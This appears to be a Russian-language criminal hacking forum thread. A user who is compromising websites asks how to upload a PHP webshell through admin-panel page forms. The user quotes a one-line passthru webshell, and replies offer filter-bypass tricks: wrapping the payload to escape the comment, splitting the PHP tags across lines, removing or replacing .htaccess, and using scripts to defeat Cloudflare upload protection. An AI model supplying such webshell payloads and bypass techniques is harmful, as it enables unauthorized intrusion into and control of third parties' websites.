• XSS.stack #1 – первый литературный журнал от юзеров форума

дайте совет по заливке вебшелла

Fine

(L3) cache
Пользователь
Реакции
110
Гарант сделки
3
Депозит
0.04 Ł
Всем привет. При хаке столкнулся с проблемой. Есть админка, я хочу попробовать залить вебшелл через формы создания страниц на сайте.
пытался залить обычный мини шелл - на выходе получаю такое в исходниках - <p><!--?php echo passthru($_GET['cmd']); ?--></p>
Я так понимаю это защита, но я не могу нагуглить можно ли как то это обойти вообще. Потому прошу совета.
Подскажите пожалуйста.

Пожалуйста, обратите внимание, что пользователь заблокирован
Ну он твой блок оборачивает в коментарий судя по всему
попробуй чет типо этого хз
<< -->?php echo passthru($_GET['cmd']); <!-->>
Знать бы на самом деле патерн/регулярку по которой она это делает, можно было бы подумать, попробуй код на строки разбить

Последнее редактирование:
Всем привет. При хаке столкнулся с проблемой. Есть админка, я хочу попробовать залить вебшелл через формы создания страниц на сайте.
пытался залить обычный мини шелл - на выходе получаю такое в исходниках - <p><!--?php echo passthru($_GET['cmd']); ?--></p>
Я так понимаю это защита, но я не могу нагуглить можно ли как то это обойти вообще. Потому прошу совета.
Подскажите пожалуйста.
Есть предположение, что все знают, что это за сайт ))))

Нихуя ты детектив:)
Такая проблема далеко не на одном сайте встретилась. Эта панелька почти везде есть где есть возможность редачить html напрямую для страниц на сайте.
Сейчас задался вопросом потому что есть пара-тройка панелей где не получается залить вебшелл через картинку, потому пробую другие пути.

А если как то рили совпало - то вообще похуй:)

Ну он твой блок оборачивает в коментарий судя по всему
попробуй чет типо этого хз
<< -->?php echo passthru($_GET['cmd']); <!-->>
Знать бы на самом деле патерн/регулярку по которой она это делает, можно было бы подумать, попробуй код на строки разбить
Я по разному пробовал и так как ты показал, в том числе:(
Насчет регулярки - ну <> энкодит в &lt; типо такого и комментит есть есть <? И ?>

Я по разному пробовал и так как ты показал, в том числе:(
Насчет регулярки - ну <> энкодит в &lt; типо такого и комментит есть есть <? И ?>
а пробовал
<
?
как то так?

а пробовал
<
?
как то так?
Да, он не понимает что это скрипт, добавляет <p> и выводит это как текст.

Сталкивался с такой же проблемой, байпаснуть не смог. У меня есть 2 предположения.
1. apache/nginx фильтруют <?php ?> последовательности в файлах не подходящего разрешения (.html, .txt etc...) но позволяют запускать .php/.php6/.phtml
2. apache/nginx не настроены на запуск .php файлов в директории куда файл записывается

Подскажите пожалуйста.
Я предлагаю тебе пройти банальную лабу на портсвигере File Upload , там как раз таки и поясняют за подобные байпассы.
Как раз таки будешь уже +- ловить понимание как и что делать в той или иной ситуации.

если вы .htaccess заблокировали вашу загрузку, вам нужно удалить .htaccess или повторно загрузить другой обходной путь .htaccess, если у вас сервер Cloudflare, вам нужен хороший скрипт для обхода безопасности загрузки

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх